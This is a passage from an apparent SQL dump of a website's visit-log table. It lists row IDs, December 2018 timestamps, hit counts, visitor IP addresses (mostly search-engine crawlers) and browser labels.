'other'),(345402,1543835576,1,1,0,0,'95.163.255.163','other'),(345403,1543835579,1,1,0,0,'95.163.255.160','other'),(345404,1543835606,6,6,0,0,'95.132.49.172','chrome'),(345405,1543836579,23,23,0,0,'178.154.244.29','other'),(345406,1543836588,2,2,0,0,'91.242.162.25','other'),(345407,1543836707,10,10,0,0,'178.154.244.11','other'),(345408,1543837022,2,2,0,0,'5.45.207.19','other'),(345409,1543837253,1,1,0,0,'66.249.73.23','chrome'),(345410,1543837285,1,1,0,0,'66.249.73.24','chrome'),(345411,1543837417,1,1,0,0,'5.45.207.79','other'),(345412,1543837525,2,2,0,0,'178.154.244.29','other'),(345413,1543837711,2,2,0,0,'91.196.177.26','chrome'),(345414,1543837821,1,1,0,0,'82.145.208.179','other'),(345415,1543837920,1,1,0,0,'178.154.244.11','other'),(345416,1543837967,1,1,0,0,'54.36.149.24','other'),(345417,1543838227,2,2,0,0,'134.249.188.214','chrome'),(345418,1543838377,1,1,0,0,'46.229.168.150','other'),(345419,1543838495,1,1,0,0,'54.36.148.165','other'),(345420,1543838796,1,1,0,0,'8.29.198.26','other'),(345421,1543838826,1,1,0,0,'178.154.244.29','other'),(345422,1543838834,1,1,0,0,'13.66.139.0','other'),(345423,1543839068,1,1,0,0,'46.229.168.147','other'),(345424,1543839216,1,1,0,0,'54.36.148.230','other'),(345425,1543839383,1,1,0,0,'54.36.148.192','other'),(345426,1543839435,1,1,0,0,'54.36.148.127','other'),(345427,1543839517,1,1,0,0,'5.58.108.133','msie'),(345428,1543839577,1,1,0,0,'46.211.150.17','chrome'),(345429,1543839761,1,1,0,0,'46.229.168.153','other'),(345430,1543839779,1,1,0,0,'40.77.167.6','other'),(345431,1543839890,1,1,0,0,'54.36.149.51','other'),(345432,1543840311,1,1,0,0,'180.76.15.134','other'),(345433,1543840312,1,1,0,0,'180.76.15.5','other'),(345434,1543840314,1,1,0,0,'157.55.39.97','other'),(345435,1543840315,1,1,0,0,'46.229.168.137','other'),(345436,1543840551,2,2,0,0,'130.180.220.188','chrome'),(345437,1543840631,1,1,0,0,'54.36.148.222','other'),(345438,1543840787,2,2,0,0,'8.29.198.25','other'),(345439,1543841107,2,2,0,0,'91.196.178.70','firefox'),(345440,1543841300,1,1,0,0,'95.163.255.64','other'),(345441,1543841303,1,1,0,0,'95.163.255.66','other'),(345442,1543841878,1,1,0,0,'95.163.255.69','other'),(345443,1543841880,1,1,0,0,'95.163.255.63','other'),(345444,1543842043,2,2,0,0,'54.165.59.7','other'),(345445,1543842338,1,1,0,0,'54.36.148.164','other'),(345446,1543842445,1,1,0,0,'178.154.244.29','other'),(345447,1543842583,1,1,0,0,'40.77.167.6','other'),(345448,1543843079,1,1,0,0,'54.165.59.7','other'),(345449,1543843233,1,1,0,0,'54.36.149.21','other'),(345450,1543843753,1,1,0,0,'95.163.255.98','other'),(345451,1543843760,1,1,0,0,'95.163.255.92','other'),(345452,1543844131,1,1,0,0,'54.36.148.174','other'),(345453,1543844171,1,1,0,0,'46.229.168.144','other'),(345454,1543844270,1,1,0,0,'46.229.168.150','other'),(345455,1543844322,1,1,0,0,'66.249.65.123','chrome'),(345456,1543844337,1,1,0,0,'40.77.167.6','other'),(345457,1543844344,1,1,0,0,'66.249.65.104','chrome'),(345458,1543844349,1,1,0,0,'190.97.165.243','other'),(345459,1543844499,2,2,0,0,'91.196.178.66','chrome'),(345460,1543845085,1,1,0,0,'54.36.149.39','other'),(345461,1543845202,4,4,0,0,'91.196.178.70','chrome'),(345462,1543845384,1,1,0,0,'157.55.39.97','other'),(345463,1543845549,2,2,0,0,'178.154.244.29','other'),(345464,1543845692,1,1,0,0,'195.140.224.21','chrome'),(345465,1543845835,1,1,0,0,'66.249.73.24','chrome'),(345466,1543845868,1,1,0,0,'66.249.65.104','chrome'),(345467,1543845906,1,1,0,0,'54.36.148.65','other'),(345468,1543846114,3,3,0,0,'91.196.178.66','chrome'),(345469,1543846244,1,1,0,0,'54.36.149.58','other'),(345470,1543846371,1,1,0,0,'54.36.148.243','other'),(345471,1543846395,1,1,0,0,'54.36.148.156','other'),(345472,1543846605,1,0,1,0,'66.249.73.25',''),(345473,1543846633,1,0,1,0,'66.249.73.26',''),(345474,1543846647,2,2,0,0,'91.196.178.74','firefox'),(345475,1543846924,1,1,0,0,'66.249.73.26','chrome'),(345476,1543847358,1,1,0,0,'46.229.168.132','other'),(345477,1543847360,1,1,0,0,'46.229.168.148','other'),(345478,1543847608,1,1,0,0,'87.250.224.65','other'),(345479,1543847631,11,11,0,0,'178.154.244.29','other'),(345480,1543847634,3,3,0,0,'5.45.207.19','other'),(345481,1543847635,12,12,0,0,'178.154.244.11','other'),(345482,1543847648,2,2,0,0,'5.45.207.79','other'),(345483,1543847677,1,1,0,0,'46.229.168.130','other'),(345484,1543847682,1,1,0,0,'91.196.178.66','chrome'),(345485,1543847977,2,2,0,0,'95.132.13.128','chrome'),(345486,1543847980,2,2,0,0,'141.8.142.103','other'),(345487,1543848261,1,1,0,0,'157.55.39.185','other'),(345488,1543848398,2,2,0,0,'207.46.13.189','other'),(345489,1543848464,2,2,0,0,'195.211.175.39','chrome'),(345490,1543848484,1,1,0,0,'46.229.168.142','other'),(345491,1543848625,3,3,0,0,'5.45.207.79','other'),(345492,1543848648,5,5,0,0,'178.154.244.11','other'),(345493,1543848667,4,4,0,0,'178.154.244.29','other'),(345494,1543848816,1,1,0,0,'5.45.207.8','other'),(345495,1543848888,4,4,0,0,'91.196.178.180','chrome'),(345496,1543848943,2,2,0,0,'91.196.178.66','chrome'),(345497,1543848990,2,2,0,0,'40.77.167.220','other'),(345498,1543849052,1,1,0,0,'40.77.167.6','other'),(345499,1543849077,2,2,0,0,'5.45.207.19','other'),(345500,1543849148,1,1,0,0,'40.77.167.185','other'),(345501,1543849338,1,1,0,0,'54.36.148.28','other'),(345502,1543849591,3,3,0,0,'178.154.244.11','other'),(345503,1543849645,1,1,0,0,'8.29.198.26','other'),(345504,1543849667,2,2,0,0,'178.154.244.29','other'),(345505,1543849784,1,1,0,0,'54.36.148.71','other'),(345506,1543850052,2,2,0,0,'91.196.178.169','chrome'),(345507,1543850194,1,1,0,0,'66.249.64.42','chrome'),(345508,1543850313,1,1,0,0,'37.115.184.19','chrome'),(345509,1543850457,2,2,0,0,'40.77.167.6','other'),(345510,1543850852,1,1,0,0,'54.36.148.194','other'),(345511,1543851031,1,1,0,0,'46.229.168.147','other'),(345512,1543851637,1,1,0,0,'8.29.198.26','other'),(345513,1543851661,1,1,0,0,'54.36.148.79','other'),(345514,1543851668,1,1,0,0,'8.29.198.25','other'),(345515,1543851910,2,2,0,0,'157.55.39.85','other'),(345516,1543852355,1,1,0,0,'46.229.168.136','other'),(345517,1543852381,2,2,0,0,'207.46.13.122','other'),(345518,1543852454,2,2,0,0,'40.77.167.17','other'),(345519,1543852519,4,4,0,0,'207.46.13.189','other'),(345520,1543852575,3,3,0,0,'157.55.39.97','other'),(345521,1543852733,2,2,0,0,'40.77.167.180','other'),(345522,1543853321,1,1,0,0,'66.249.64.60','chrome'),(345523,1543853434,2,2,0,0,'40.77.167.17','other'),(345524,1543853558,1,1,0,0,'66.249.64.40','chrome'),(345525,1543853590,2,2,0,0,'207.46.13.189','other'),(345526,1543853744,1,1,0,0,'157.55.39.97','other'),(345527,1543854160,2,2,0,0,'207.46.13.122','other'),(345528,1543854295,1,1,0,0,'54.36.148.179','other'),(345529,1543854340,2,2,0,0,'157.55.39.144','other'),(345530,1543854376,1,1,0,0,'91.196.177.156','chrome'),(345531,1543854757,3,3,0,0,'157.55.39.97','other'),(345532,1543854935,1,1,0,0,'54.36.149.94','other'),(345533,1543855368,1,1,0,0,'95.163.255.94','other'),(345534,1543855371,1,1,0,0,'95.163.255.98','other'),(345535,1543855521,1,1,0,0,'54.36.148.144','other'),(345536,1543855809,1,1,0,0,'66.249.64.59','chrome'),(345537,1543855829,1,1,0,0,'157.55.39.97','other'),(345538,1543855833,2,2,0,0,'40.77.167.17','other'),(345539,1543855838,2,2,0,0,'207.46.13.189','other'),(345540,1543855883,1,1,0,0,'66.249.64.40','chrome'),(345541,1543856010,2,2,0,0,'40.77.167.77','other'),(345542,1543856168,1,1,0,0,'95.163.255.183','other'),(345543,1543856171,1,1,0,0,'95.163.255.173','other'),(345544,1543856235,1,1,0,0,'66.249.64.60','chrome'),(345545,1543856471,1,1,0,0,'95.163.255.186','other'),(345546,1543856475,1,1,0,0,'95.163.255.159','other'),(345547,1543856581,1,1,0,0,'66.249.64.41','chrome'),(345548,1543856593,1,1,0,0,'62.205.134.182','msie'),(345549,1543856628,1,1,0,0,'66.249.64.58','chrome'),(345550,1543856738,2,2,0,0,'157.55.39.97','other'),(345551,1543857008,1,1,0,0,'66.249.64.40','chrome'),(345552,1543857061,3,3,0,0,'40.77.167.128','other'),(345553,1543857376,1,1,0,0,'77.111.244.89','chrome'),(345554,1543857961,2,2,0,0,'157.55.39.97','other'),(345555,1543858071,1,1,0,0,'95.163.255.107','other'),(345556,1543858125,1,1,0,0,'54.36.148.235','other'),(345557,1543858139,1,1,0,0,'95.163.255.115','other'),(345558,1543858166,1,1,0,0,'95.163.255.104','other'),(345559,1543858189,1,1,0,0,'95.163.255.113','other'),(345560,1543858217,1,1,0,0,'95.163.255.105','other'),(345561,1543858236,1,1,0,0,'95.163.255.109','other'),(345562,1543858259,1,1,0,0,'95.163.255.119','other'),(345563,1543858288,1,1,0,0,'95.163.255.108','other'),(345564,1543858311,1,1,0,0,'95.163.255.114','other'),(345565,1543858335,1,1,0,0,'95.163.255.117','other'),(345566,1543858337,1,1,0,0,'207.46.13.57','other'),(345567,1543858428,2,2,0,0,'46.229.168.132','other'),(345568,1543858451,1,1,0,0,'54.36.148.250','other'),(345569,1543858562,1,1,0,0,'46.229.168.133','other'),(345570,1543858606,1,1,0,0,'46.229.168.147','other'),(345571,1543858608,1,1,0,0,'46.229.168.141','other'),(345572,1543858739,1,1,0,0,'46.229.168.134','other'),(345573,1543859170,1,1,0,0,'178.154.244.29','other'),(345574,1543859404,1,1,0,0,'54.36.148.242','other'),(345575,1543860018,1,1,0,0,'157.55.39.97','other'),(345576,1543860109,1,1,0,0,'207.46.13.189','other'),(345577,1543860256,1,1,0,0,'54.36.148.36','other'),(345578,1543860496,1,1,0,0,'8.29.198.27','other'),(345579,1543860676,2,2,0,0,'40.77.167.128','other'),(345580,1543860725,1,1,0,0,'54.36.148.103','other'),(345581,1543860769,3,3,0,0,'5.45.207.79','other'),(345582,1543860797,3,3,0,0,'178.154.244.29','other'),(345583,1543860831,1,1,0,0,'178.154.244.11','other'),(345584,1543860840,1,1,0,0,'5.45.207.19','other'),(345585,1543860859,1,1,0,0,'141.8.142.103','other'),(345586,1543861045,1,1,0,0,'66.249.64.41','chrome'),(345587,1543861052,1,1,0,0,'54.36.149.63','other'),(345588,1543861070,1,1,0,0,'66.249.64.60','chrome'),(345589,1543861135,1,1,0,0,'66.249.64.40','chrome'),(345590,1543861525,2,2,0,0,'207.46.13.189','other'),(345591,1543861748,1,1,0,0,'207.46.13.57','other'),(345592,1543861769,2,2,0,0,'46.211.119.189','chrome'),(345593,1543862285,1,1,0,0,'66.249.64.59','chrome'),(345594,1543862300,2,2,0,0,'66.249.64.42','chrome'),(345595,1543862482,2,2,0,0,'8.29.198.27','other'),(345596,1543862827,1,1,0,0,'178.154.244.11','other'),(345597,1543862933,2,2,0,0,'157.55.39.97','other'),(345598,1543863108,1,1,0,0,'46.229.168.135','other'),(345599,1543863109,1,1,0,0,'5.58.105.70','firefox'),(345600,1543863110,1,1,0,0,'46.229.168.141','other'),(345601,1543863452,1,1,0,0,'54.36.148.107','other'),(345602,1543863675,2,2,0,0,'207.46.13.189','other'),(345603,1543863768,1,1,0,0,'207.46.13.57','other'),(345604,1543864115,1,1,0,0,'66.249.64.59','chrome'),(345605,1543864153,1,1,0,0,'66.249.64.44','chrome'),(345606,1543864173,1,1,0,0,'95.163.255.114','other'),(345607,1543864181,2,2,0,0,'207.46.13.106','other'),(345608,1543864187,1,1,0,0,'95.163.255.109','other'),(345609,1543864204,1,1,0,0,'95.163.255.105','other'),(345610,1543864214,1,1,0,0,'95.163.255.103','other'),(345611,1543864227,1,1,0,0,'95.163.255.119','other'),(345612,1543864237,1,1,0,0,'95.163.255.117','other'),(345613,1543864492,1,1,0,0,'54.36.148.46','other'),(345614,1543864617,1,1,0,0,'31.184.238.56','chrome'),(345615,1543864661,1,1,0,0,'54.36.149.46','other'),(345616,1543864759,3,3,0,0,'207.46.13.189','other'),(345617,1543864913,1,1,0,0,'54.36.148.57','other'),(345618,1543865051,1,1,0,0,'46.229.168.132','other'),(345619,1543866011,1,1,0,0,'54.36.148.243','other'),(345620,1543866213,1,1,0,0,'54.36.148.137','other'),(345621,1543866322,1,1,0,0,'54.36.148.158','other'),(345622,1543866328,1,1,0,0,'46.229.168.129','other'),(345623,1543866367,1,1,0,0,'54.36.149.2','other'),(345624,1543866451,1,1,0,0,'207.46.13.57','other'),(345625,1543866477,2,2,0,0,'207.46.13.106','other'),(345626,1543866589,2,2,0,0,'95.163.255.95','other'),(345627,1543866868,1,1,0,0,'54.36.148.173','other'),(345628,1543866874,2,2,0,0,'157.55.39.97','other'),(345629,1543867268,1,1,0,0,'46.229.168.135','other'),(345630,1543867307,4,4,0,0,'207.46.13.189','other'),(345631,1543867889,1,1,0,0,'95.163.255.93','other'),(345632,1543867898,1,1,0,0,'95.163.255.99','other'),(345633,1543868017,1,1,0,0,'66.249.64.41','chrome'),(345634,1543868043,1,1,0,0,'66.249.64.60','chrome'),(345635,1543868053,1,1,0,0,'66.249.64.39','chrome'),(345636,1543868076,1,1,0,0,'66.249.64.58','chrome'),(345637,1543868136,1,1,0,0,'54.36.148.121','other'),(345638,1543868165,1,1,0,0,'54.36.148.125','other'),(345639,1543868505,1,1,0,0,'54.36.148.112','other'),(345640,1543868636,1,1,0,0,'180.76.15.155','other'),(345641,1543869144,1,1,0,0,'207.46.13.106','other'),(345642,1543869734,1,1,0,0,'5.188.210.53','chrome'),(345643,1543869887,1,1,0,0,'54.36.148.97','other'),(345644,1543869936,1,1,0,0,'46.229.168.147','other'),(345645,1543870425,2,2,0,0,'34.209.115.8','chrome'),(345646,1543870858,1,1,0,0,'80.252.154.233','firefox'),(345647,1543871122,2,1,1,0,'66.249.64.60',''),(345648,1543871345,1,1,0,0,'8.29.198.25','other'),(345649,1543871447,3,3,0,0,'40.77.167.3','other'),(345650,1543871791,1,1,0,0,'54.36.149.1','other'),(345651,1543872004,4,4,0,0,'40.77.167.0','other'),(345652,1543872271,1,1,0,0,'54.36.149.35','other'),(345653,1543872413,15,15,0,0,'178.154.244.29','other'),(345654,1543872472,1,1,0,0,'54.36.148.235','other'),(345655,1543872482,13,13,0,0,'178.154.244.11','other'),(345656,1543872495,1,1,0,0,'54.36.149.66','other'),(345657,1543872565,2,2,0,0,'5.45.207.79','other'),(345658,1543872589,3,3,0,0,'40.77.167.3','other'),(345659,1543872759,1,1,0,0,'141.8.142.103','other'),(345660,1543872919,1,1,0,0,'54.36.148.106','other'),(345661,1543872948,1,1,0,0,'95.108.213.4','other'),(345662,1543873314,2,2,0,0,'8.29.198.25','other'),(345663,1543873321,4,4,0,0,'178.154.244.29','other'),(345664,1543873377,1,1,0,0,'54.36.148.212','other'),(345665,1543873385,1,1,0,0,'54.36.148.208','other'),(345666,1543873440,2,2,0,0,'178.154.244.11','other'),(345667,1543874550,4,4,0,0,'207.46.13.106','other'),(345668,1543874581,1,1,0,0,'95.46.141.83','opera'),(345669,1543874594,1,1,0,0,'46.229.168.153','other'),(345670,1543874596,1,1,0,0,'46.229.168.148','other'),(345671,1543874796,1,1,0,0,'54.36.148.89','other'),(345672,1543875088,1,1,0,0,'46.229.168.144','other'),(345673,1543875500,1,1,0,0,'54.36.148.183','other'),(345674,1543875782,1,1,0,0,'54.36.149.80','other'),(345675,1543875810,1,1,0,0,'54.36.148.132','other'),(345676,1543876089,2,2,0,0,'40.77.167.3','other'),(345677,1543876178,1,1,0,0,'54.36.149.37','other'),(345678,1543876714,2,2,0,0,'40.77.167.0','other'),(345679,1543877434,1,1,0,0,'95.46.141.83','opera'),(345680,1543877523,2,2,0,0,'207.46.13.106','other'),(345681,1543877666,2,2,0,0,'162.210.196.100','other'),(345682,1543878010,1,1,0,0,'54.36.148.218','other'),(345683,1543878185,1,1,0,0,'54.36.149.67','other'),(345684,1543878247,1,1,0,0,'54.36.149.104','other'),(345685,1543878448,1,1,0,0,'66.249.64.60','chrome'),(345686,1543879062,2,2,0,0,'207.46.13.106','other'),(345687,1543879229,1,1,0,0,'95.163.255.160','other'),(345688,1543879232,1,1,0,0,'95.163.255.161','other'),(345689,1543879655,1,1,0,0,'95.163.255.183','other'),(345690,1543879658,1,1,0,0,'95.163.255.179','other'),(345691,1543880107,1,1,0,0,'54.36.148.18','other'),(345692,1543880427,1,1,0,0,'54.36.148.71','other'),(345693,1543880795,1,1,0,0,'66.249.64.57','chrome'),(345694,1543880827,3,3,0,0,'91.121.109.55','other'),(345695,1543880843,1,1,0,0,'66.249.64.44','chrome'),(345696,1543880889,1,1,0,0,'40.77.167.0','other'),(345697,1543881781,2,2,0,0,'46.229.168.149','other'),(345698,1543881946,2,2,0,0,'88.198.33.145','other'),(345699,1543882194,1,1,0,0,'8.29.198.26','other'),(345700,1543882235,2,2,0,0,'40.77.167.0','other'),(345701,1543882466,1,1,0,0,'54.36.148.190','other'),(345702,1543882481,1,1,0,0,'95.163.255.176','other'),(345703,1543882484,1,1,0,0,'95.163.255.174','other'),(345704,1543882519,2,2,0,0,'40.77.167.3','other'),(345705,1543882672,4,4,0,0,'207.46.13.144','other'),(345706,1543882934,6,6,0,0,'5.45.207.19','other'),(345707,1543883018,3,3,0,0,'5.45.207.79','other'),(345708,1543883130,13,13,0,0,'178.154.244.29','other'),(345709,1543883147,14,14,0,0,'178.154.244.11','other'),(345710,1543883313,1,1,0,0,'37.9.113.148','other'),(345711,1543883497,2,2,0,0,'95.108.213.4','other'),(345712,1543883559,1,1,0,0,'54.36.149.79','other'),(345713,1543883599,6,6,0,0,'40.77.167.0','other'),(345714,1543883668,1,1,0,0,'66.249.64.42','chrome'),(345715,1543883806,1,1,0,0,'46.229.168.137','other'),(345716,1543883808,1,1,0,0,'46.229.168.146','other'),(345717,1543884094,1,1,0,0,'95.163.255.182','other'),(345718,1543884098,1,1,0,0,'95.163.255.187','other'),(345719,1543884109,1,1,0,0,'178.154.244.11','other'),(345720,1543884158,2,2,0,0,'8.29.198.25','other'),(345721,1543884175,3,3,0,0,'178.154.244.29','other'),(345722,1543884229,4,4,0,0,'40.77.167.3','other'),(345723,1543884459,1,1,0,0,'95.163.255.166','other'),(345724,1543884462,1,1,0,0,'95.163.255.181','other'),(345725,1543884936,1,1,0,0,'94.142.242.84','other'),(345726,1543884946,9,9,0,0,'207.46.13.144','other'),(345727,1543885028,2,2,0,0,'40.77.167.0','other'),(345728,1543885488,1,1,0,0,'40.77.167.3','other'),(345729,1543887527,1,1,0,0,'54.165.59.7','other'),(345730,1543887838,1,1,0,0,'46.229.168.145','other'),(345731,1543887941,2,2,0,0,'40.77.167.3','other'),(345732,1543888355,1,1,0,0,'54.36.148.165','other'),(345733,1543888464,1,1,0,0,'46.229.168.146','other'),(345734,1543888477,2,2,0,0,'54.191.148.123','chrome'),(345735,1543888635,1,1,0,0,'95.163.255.184','other'),(345736,1543888641,1,1,0,0,'95.163.255.178','other'),(345737,1543888656,1,1,0,0,'95.163.255.156','other'),(345738,1543888658,1,1,0,0,'95.163.255.170','other'),(345739,1543888857,1,1,0,0,'95.163.255.93','other'),(345740,1543888861,1,1,0,0,'95.163.255.97','other'),(345741,1543889407,1,1,0,0,'54.36.149.12','other'),(345742,1543889470,1,1,0,0,'40.77.167.41','other'),(345743,1543889520,1,1,0,0,'54.36.148.183','other'),(345744,1543889775,1,1,0,0,'46.229.168.135','other'),(345745,1543889778,1,1,0,0,'46.229.168.149','other'),(345746,1543890285,4,4,0,0,'40.77.167.40','other'),(345747,1543890377,1,1,0,0,'66.249.64.57','chrome'),(345748,1543890417,2,2,0,0,'40.77.167.41','other'),(345749,1543890423,2,2,0,0,'66.249.64.44','chrome'),(345750,1543890500,3,3,0,0,'40.77.167.43','other'),(345751,1543891261,2,2,0,0,'66.249.64.60','chrome'),(345752,1543891377,2,2,0,0,'40.77.167.42','other'),(345753,1543891608,1,1,0,0,'91.242.162.69','other'),(345754,1543891724,1,1,0,0,'66.249.64.42','chrome'),(345755,1543891845,2,2,0,0,'40.77.167.43','other'),(345756,1543891858,1,1,0,0,'46.229.168.142','other'),(345757,1543891873,9,9,0,0,'178.154.244.29','other'),(345758,1543892124,2,2,0,0,'207.46.13.106','other'),(345759,1543892130,1,1,0,0,'54.36.148.249','other'),(345760,1543892168,5,5,0,0,'178.154.244.11','other'),(345761,1543892281,7,7,0,0,'5.45.207.79','other'),(345762,1543892327,5,5,0,0,'5.45.207.19','other'),(345763,1543892333,2,2,0,0,'40.77.167.41','other'),(345764,1543892450,2,2,0,0,'141.8.142.103','other'),(345765,1543892558,2,2,0,0,'95.108.213.4','other'),(345766,1543892807,1,1,0,0,'37.9.113.148','other'),(345767,1543892823,2,2,0,0,'40.77.167.43','other'),(345768,1543892888,2,2,0,0,'66.249.64.44','chrome'),(345769,1543892890,2,2,0,0,'178.154.244.29','other'),(345770,1543893044,1,1,0,0,'8.29.198.27','other'),(345771,1543893290,2,2,0,0,'40.77.167.41','other'),(345772,1543893617,1,1,0,0,'54.36.148.53','other'),(345773,1543893645,1,1,0,0,'95.163.255.170','other'),(345774,1543893648,1,1,0,0,'95.163.255.181','other'),(345775,1543893725,1,1,0,0,'46.229.168.144','other'),(345776,1543893752,1,1,0,0,'40.77.167.43','other'),(345777,1543893790,1,1,0,0,'46.229.168.145','other'),(345778,1543894193,1,1,0,0,'95.163.255.184','other'),(345779,1543894196,1,1,0,0,'95.163.255.177','other'),(345780,1543894339,2,2,0,0,'40.77.167.42','other'),(345781,1543894377,1,1,0,0,'54.36.148.240','other'),(345782,1543894528,2,2,0,0,'95.163.255.96','other'),(345783,1543894533,2,2,0,0,'40.77.167.0','other'),(345784,1543894556,2,2,0,0,'40.77.167.40','other'),(345785,1543894756,1,1,0,0,'54.36.148.207','other'),(345786,1543894994,1,1,0,0,'8.29.198.27','other'),(345787,1543895048,1,1,0,0,'8.29.198.26','other'),(345788,1543895459,1,1,0,0,'40.77.167.42','other'),(345789,1543895834,1,1,0,0,'46.229.168.151','other'),(345790,1543896582,3,3,0,0,'40.77.167.40','other'),(345791,1543896609,2,2,0,0,'40.77.167.42','other'),(345792,1543897208,1,1,0,0,'40.77.167.43','other'),(345793,1543897560,1,1,0,0,'95.163.255.172','other'),(345794,1543897563,1,1,0,0,'95.163.255.179','other'),(345795,1543897711,4,4,0,0,'40.77.167.42','other'),(345796,1543897968,2,2,0,0,'40.77.167.40','other'),(345797,1543898090,3,3,0,0,'40.77.167.41','other'),(345798,1543898161,7,7,0,0,'40.77.167.43','other'),(345799,1543898888,4,4,0,0,'40.77.167.42','other'),(345800,1543899168,4,4,0,0,'40.77.167.43','other'),(345801,1543899656,1,1,0,0,'54.36.148.247','other'),(345802,1543899862,1,1,0,0,'5.188.210.53','chrome'),(345803,1543899934,2,2,0,0,'40.77.167.41','other'),(345804,1543900104,1,1,0,0,'95.163.255.96','other'),(345805,1543900109,1,1,0,0,'95.163.255.95','other'),(345806,1543900236,1,1,0,0,'54.36.148.233','other'),(345807,1543900439,1,1,0,0,'40.77.167.40','other'),(345808,1543900643,15,15,0,0,'178.154.244.29','other'),(345809,1543900682,2,2,0,0,'40.77.167.42','other'),(345810,1543900776,12,12,0,0,'178.154.244.11','other'),(345811,1543900917,2,2,0,0,'46.229.168.138','other'),(345812,1543900923,1,1,0,0,'46.229.168.142','other'),(345813,1543900924,4,4,0,0,'5.45.207.79','other'),(345814,1543900986,1,1,0,0,'54.36.148.91','other'),(345815,1543901068,2,2,0,0,'89.178.238.76','firefox'),(345817,1543901274,1,1,0,0,'54.36.148.19','other'),(345818,1543901313,1,1,0,0,'37.9.113.20','other'),(345819,1543901578,2,2,0,0,'178.154.244.29','other'),(345820,1543901591,1,1,0,0,'40.77.167.42','other'),(345821,1543901702,1,1,0,0,'178.154.244.11','other'),(345822,1543901724,1,1,0,0,'46.229.168.148','other'),(345823,1543901861,1,1,0,0,'5.45.207.79','other'),(345824,1543902296,2,2,0,0,'66.249.64.58','chrome'),(345825,1543902409,2,2,0,0,'40.77.167.43','other'),(345826,1543902477,1,1,0,0,'40.77.167.41','other'),(345827,1543902566,1,1,0,0,'66.249.64.41','chrome'),(345828,1543902570,1,1,0,0,'66.249.64.60','chrome'),(345829,1543902649,1,1,0,0,'207.46.13.144','other'),(345830,1543902840,2,2,0,0,'40.77.167.42','other'),(345831,1543902874,2,2,0,0,'178.154.244.11','other'),(345832,1543902975,4,4,0,0,'40.77.167.40','other'),(345833,1543903085,1,1,0,0,'54.36.148.213','other'),(345834,1543903320,1,1,0,0,'37.9.113.148','other'),(345835,1543903670,1,1,0,0,'54.36.148.187','other'),(345836,1543903897,1,1,0,0,'8.29.198.26','other'),(345837,1543904062,2,2,0,0,'40.77.167.42','other'),(345838,1543904248,2,2,0,0,'40.77.167.43','other'),(345839,1543904260,5,5,0,0,'40.77.167.41','other'),(345840,1543904319,1,1,0,0,'66.249.64.60','chrome'),(345841,1543904325,1,1,0,0,'95.163.255.159','other'),(345842,1543904328,1,1,0,0,'95.163.255.164','other'),(345843,1543904861,1,1,0,0,'54.36.148.26','other'),(345844,1543904948,1,1,0,0,'5.45.207.79','other'),(345845,1543905022,1,1,0,0,'178.154.244.29','other'),(345846,1543905026,1,1,0,0,'178.154.244.11','other'),(345847,1543905372,2,2,0,0,'46.229.168.129','other'),(345848,1543905400,1,1,0,0,'209.17.97.18','other'),(345849,1543905727,1,1,0,0,'46.229.168.146','other'),(345850,1543905753,1,1,0,0,'95.163.255.93','other'),(345851,1543905761,1,1,0,0,'95.163.255.99','other'),(345852,1543905818,2,2,0,0,'46.229.168.136','other'),(345853,1543905833,1,1,0,0,'8.29.198.25','other'),(345854,1543905892,1,1,0,0,'8.29.198.26','other'),(345855,1543906036,1,1,0,0,'54.36.148.53','other'),(345856,1543906288,1,1,0,0,'46.229.168.129','other'),(345857,1543906531,1,1,0,0,'46.229.168.151','other'),(345858,1543906731,1,1,0,0,'54.36.149.55','other'),(345859,1543906766,1,1,0,0,'95.135.91.210','chrome'),(345860,1543906827,1,0,1,0,'66.249.64.58',''),(345861,1543907026,1,1,0,0,'46.229.168.153','other'),(345862,1543907065,1,1,0,0,'54.36.148.224','other'),(345863,1543907107,2,2,0,0,'40.77.167.42','other'),(345864,1543907113,2,2,0,0,'40.77.167.43','other'),(345865,1543907217,1,1,0,0,'54.36.149.77','other'),(345866,1543907346,2,2,0,0,'40.77.167.40','other'),(345867,1543907367,2,2,0,0,'212.90.61.25','chrome'),(345868,1543907789,3,3,0,0,'40.77.167.41','other'),(345869,1543907790,3,3,0,0,'185.34.224.10','chrome'),(345870,1543907889,1,1,0,0,'66.249.64.41','chrome'),(345871,1543907909,1,1,0,0,'66.249.64.60','chrome'),(345872,1543907934,1,1,0,0,'54.36.148.243','other'),(345873,1543908133,1,1,0,0,'54.36.148.63','other'),(345874,1543908207,2,2,0,0,'40.77.167.42','other'),(345875,1543908270,1,1,0,0,'95.163.255.154','other'),(345876,1543908274,1,1,0,0,'95.163.255.162','other'),(345877,1543908348,5,5,0,0,'178.154.244.11','other'),(345878,1543908374,4,4,0,0,'178.154.244.29','other'),(345879,1543908675,3,3,0,0,'91.242.162.52','other'),(345880,1543908699,1,1,0,0,'54.36.149.81','other'),(345881,1543909104,4,4,0,0,'40.77.167.43','other'),(345882,1543909111,3,3,0,0,'40.77.167.41','other'),(345883,1543909197,2,2,0,0,'40.77.167.40','other'),(345884,1543909359,1,1,0,0,'178.94.154.75','chrome'),(345885,1543909400,2,2,0,0,'91.196.178.167','chrome'),(345886,1543909467,1,1,0,0,'178.154.244.29','other'),(345887,1543909531,1,1,0,0,'66.249.64.59','chrome'),(345888,1543909588,1,1,0,0,'66.249.64.42','chrome'),(345889,1543909701,1,1,0,0,'66.249.64.58','chrome'),(345890,1543909790,2,2,0,0,'178.154.244.11','other'),(345891,1543909918,1,1,0,0,'91.196.179.138','chrome'),(345892,1543910019,1,1,0,0,'40.77.167.213','other'),(345893,1543910083,5,5,0,0,'40.77.167.41','other'),(345894,1543910109,2,2,0,0,'40.77.167.40','other'),(345895,1543910358,1,1,0,0,'130.180.216.129','chrome'),(345896,1543910399,2,2,0,0,'37.54.187.98','chrome'),(345897,1543910490,2,2,0,0,'91.196.178.66','chrome'),(345898,1543910553,1,1,0,0,'54.36.148.133','other'),(345899,1543910600,2,2,0,0,'212.87.168.109','chrome'),(345900,1543910929,3,3,0,0,'91.242.162.52','other'),(345901,1543911114,1,1,0,0,'185.220.36.80','msie'),(345902,1543911116,1,1,0,0,'128.68.211.235','msie'),(345903,1543911142,2,2,0,0,'40.77.167.207','other'),(345904,1543911152,1,1,0,0,'40.77.167.43','other'),(345905,1543911663,1,1,0,0,'40.77.167.41','other'),(345906,1543911881,1,1,0,0,'54.36.148.172','other'),(345907,1543912041,2,2,0,0,'95.158.34.138','chrome'),(345908,1543912142,1,1,0,0,'46.229.168.130','other'),(345909,1543912657,1,1,0,0,'54.36.148.136','other'),(345910,1543912840,1,1,0,0,'40.77.167.41','other'),(345911,1543913320,1,0,1,0,'66.249.64.42',''),(345912,1543913779,1,1,0,0,'178.95.246.220','chrome'),(345913,1543913892,1,1,0,0,'54.36.148.110','other'),(345914,